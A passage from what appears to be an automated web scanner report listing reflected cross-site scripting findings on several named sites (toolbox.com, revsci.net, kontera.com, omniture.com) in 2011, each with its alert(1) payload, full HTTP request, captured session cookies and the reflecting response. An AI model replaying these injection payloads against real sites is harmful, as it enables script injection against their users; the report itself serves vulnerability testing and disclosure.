4.138. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/ppmtoday

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f740'-alert(1)-'6ebdefa1aa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/ppmtoday?1f740'-alert(1)-'6ebdefa1aa5=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63708
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%261f740'-alert(1)-'6ebdefa1aa5%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.139. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload d10fd<script>alert(1)</script>5443b795f8c was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=F08747d10fd<script>alert(1)</script>5443b795f8c HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; udm_0=MLv3NSMJaSpn3g1FgecyID/YTWjxcmn+jRwDtK6yKGSqLiDCbz2rscDhNkPJfBSzlL4dxsqrgwGwTcU0yVOl93x0bsnVOXBsYOd//QgpPolrbS4+Nw8pZmwuLu/BFF7QsvnGgRit9IQdrMe68QJG+xARlbfeqCut/4QAwRNJQR/XlVBysq/jrFHdWb+7tcucPJDdqOzrQiKJQMWveoQqCvYVuCItXlfGZkoyggle3az/HvQUB76nGMvM6aK+iHbgmmWUZ7vTesbzpgDUtcCDBy1OP8b/EWRyH4uNf3IiIEN7uN/unTN7wj+d3aJN+S/uAmGvQTMbx92ct+tNW/fLsANU3MGbWx9PWZB8OCJZ1Jjg7/r6sb6HKhDbfUhULrzcm41SNIyqo/UPwJQztEuuuiLIririPZSp5K8cha5iUvwBePNVNuTjmqDgmws5XPyigl5UM6qcPfeQiBpeVKzEw1/Vq2msHxmzpfSHKTD8e90Ps1HEYrkFOPic6v6njtkrtHLHDXb971WO7HB/0bEjCaOTtCC9kXesDSj90s8MzA++V01FrJ3dgnIeesBl0xJxLJRIU5VhoyLHXgkVIX37uD6r7oH0cMDf2K7Eaupks0wRDpggvT5EFH8JlWlBVNXM79nOtYm2WHhGrjCqhrat51GMQL5cfCHYT3mZFcmfFrSHZGkbkOFSTPWvaB2MEzzvZmVxJjOFYAeGcJdekdsk/yPfbRlXWhTqBzXFxnBdkAVVgrh2H6Jj/iMj22RD7lrrnu0tLor5OZ8cn6Ym51edHhgpShQyzLU9V8EG0n7wfEQLBINnz6LPBtX6+8SS5RQrtiF/eGzW8dYK23z34XahxqULrJN5RQMIu5VTy7/Ghw6qjoZ/sD5mTNDI+RcSBdg0d0+9f7uCZnkisLc6SVCJ5iUT5F9LuU/+AfJo2l8alr6bDLTj2kS4UGIT3Ac5OdkWIBI/wfXDydN6T1e3I63W6L/h9vQpbrgZAA/KjPp2Yq4gjVuQsW3u4AbuNaZJ51egQSvC1zJn+6C/ibzxCxGnJ3bIiVn23LgeutuBiHfVN+6fwIGIhfLz3WmndFELqStWoNJq+LCRtr5BMYrCX5JQu49xYlIiFztxwRQPG4DDLowZx9qjXQOR8xq6IWWic6t7idKbOc4DlCW/3azG8wjO4MNyD2fCSb0csZSqhgdPg8/egWktt/TP2cZ4dhF+JU3+tmQ7e5p2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 02 Feb 2011 15:27:14 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 03 Feb 2011 15:27:14 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Wed, 02 Feb 2011 15:27:14 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "F08747D10FD<SCRIPT>ALERT(1)</SCRIPT>5443B795F8C" was not recognized.
*/

4.140. http://kona5.kontera.com/KonaGet.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kona5.kontera.com
Path:	/KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98161"%3balert(1)//e83152febaa was submitted in the l parameter. This input was echoed as 98161";alert(1)//e83152febaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html98161"%3balert(1)//e83152febaa&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=0&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 11135

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=131855&layout=adlinks&sId=892,1017&cb=1296570685&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(5);

...[SNIP]...
8517915;
konaRequestId="27018855101607070";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html98161";alert(1)//e83152febaa&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

4.141. http://kona5.kontera.com/KonaGet.js [rId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kona5.kontera.com
Path:	/KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7bc"-alert(1)-"ecbff65bd55 was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /KonaGet.js?u=1296570530969&p=131855&k=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.htmljpNNP3&al=1&l=http%3A//www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&t=Twitter+Tweets+about+Llc+as+of+January+20+%2C+2011+-+Montana+Plates&m1=Montana+LLC+%2C+llc+%2C+Montana+Liscence+plates&rId=09d7bc"-alert(1)-"ecbff65bd55&rl=0&1=14&mod=65563&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.1%20r103|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 10579

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=131855&layout=adlinks&sId=892,1017&cb=1296570686&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(5);

...[SNIP]...
nsion" : { "urls" : [] } }, { "bridge_position" : { "value" : "" } }, { "advanced_setting_ad_type_id" : { "value" : 10 } } ]});
teDataHere(false,'131855','1');
konaTweakMode=134300187;
konaRequestId="09d7bc"-alert(1)-"ecbff65bd55";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dc_aff_id=");
onKonaReturn(1);
}, "react
...[SNIP]...

4.142. http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://millenniumhotels.tt.omtrdc.net
Path:	/m2/millenniumhotels/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 73495<script>alert(1)</script>00d7074f8fe was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/millenniumhotels/mbox/standard?mboxHost=www.millenniumhotels.com&mboxSession=1296573995979-796819&mboxPage=1296573995979-796819&screenHeight=1200&screenWidth=1920&browserWidth=1036&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=2&hotelId=11536&mbox=Homepage_LeftNavStyle73495<script>alert(1)</script>00d7074f8fe&mboxId=0&mboxTime=1296552397746&mboxURL=http%3A%2F%2Fwww.millenniumhotels.com%2Fmillenniumboston%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmillenium%2Bboston&mboxVersion=39 HTTP/1.1
Host: millenniumhotels.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 217
Date: Wed, 02 Feb 2011 15:36:11 GMT
Server: Test & Target

mboxFactories.get('default').get('Homepage_LeftNavStyle73495<script>alert(1)</script>00d7074f8fe',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1296573995979-796819.17");

4.143. https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc1a9'-alert(1)-'6acc01123fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /login/?cc1a9'-alert(1)-'6acc01123fe=1 HTTP/1.1
Host: my.omniture.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:18:21 GMT
Server: Omniture AWS/2.0.0
xserver: www476
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 52249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<!--[if IE 9]
...[SNIP]...
ease choose a valid version');
               setTimeout(unfeedback, 0);
               return false;
           }

           url = 'https://my.omniture.com/sc' + vo.options[vo.selectedIndex].value + '/reports/index.html';
           url += '?cc1a9'-alert(1)-'6acc01123fe=1';
           if (vo.options[vo.selectedIndex].value >
...[SNIP]...

4.144. https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38a79"-alert(1)-"7f4bdae527e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /login/?38a79"-alert(1)-"7f4bdae527e=1 HTTP/1.1
Host: my.omniture.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e; cms_site_lang=1; use207=7; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; s_cid=seo_other_referer; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_sv_p1=1@15@s/5084/5072&e/5; s_sv_s1=1@29@a//1296661247027/594025749283; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; sc_locale=en_US; sc_locale_numbers=en_US

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:18:12 GMT
Server: Omniture AWS/2.0.0
xserver: www441
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 52249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<!--[if IE 9]
...[SNIP]...
jpj":"35919627386597","dashboard_id":"","history_id":"35919627386597","excel":"","came_from":"%2Flogin%2Findex.html%3F38a79%255C%2522-alert%25281%2529-%255C%25227f4bdae527e%3D1","REQUEST_URI":"/login/?38a79"-alert(1)-"7f4bdae527e=1","OBERON_START_DATE":null,"jpj_old":""};
Omniture.Config.reportname = 'Adobe Online Marketing Suite';
Omniture.Config.page_id = '100000';
Omniture.Config.recent_date_range_js = null;
Omniture.Config
...[SNIP]...

4.145. https://my.omniture.com/p/suite/1.2/index.html [jpj parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/p/suite/1.2/index.html

Issue detail

The value of the jpj request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a15"-alert(1)-"9e4c75fec7b was submitted in the jpj parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132c2a15"-alert(1)-"9e4c75fec7b HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:32:17 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www645
Content-Type: text/html
Connection: close
Content-Length: 27728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<!--[if I
...[SNIP]...
62343468","excel":"","came_from":"%2Fp%2Fsuite%2F1.2%2Findex.html%3Fa%3DMain.SSOHelp","REQUEST_URI":"/p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132c2a15"-alert(1)-"9e4c75fec7b","OBERON_START_DATE":null,"jpj_old":"95253754444132c2a15"-alert(1)-"9e4c75fec7b"};
Omniture.Config.reportname = '';
Omniture.Config.page_id = '100000';
Omniture.Config.recent_date_range_js = null;
Omn
...[SNIP]...

4.146. https://my.omniture.com/p/suite/1.2/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/p/suite/1.2/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfe1"-alert(1)-"79f9f86c119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132&ebfe1"-alert(1)-"79f9f86c119=1 HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:33:35 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www453
Content-Type: text/html
Connection: close
Content-Length: 27828

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<!--[if I
...[SNIP]...
tml%3Fa%3DMain.SSOHelp%26ebfe1%255C%2522-alert%25281%2529-%255C%252279f9f86c119%3D1","REQUEST_URI":"/p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132&ebfe1"-alert(1)-"79f9f86c119=1","OBERON_START_DATE":null,"jpj_old":"95253754444132"};
Omniture.Config.reportname = '';
Omniture.Config.page_id = '100000';
Omniture.Config.recent_date_range_js = null;
Omniture.Config.default_repor
...[SNIP]...

4.147. https://my.omniture.com/p/suite/1.2/index.html [ssSession parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/p/suite/1.2/index.html

Issue detail

The value of the ssSession request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e86ee"-alert(1)-"66ebe3920b5 was submitted in the ssSession parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67e86ee"-alert(1)-"66ebe3920b5&jpj=95253754444132 HTTP/1.1
Host: my.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
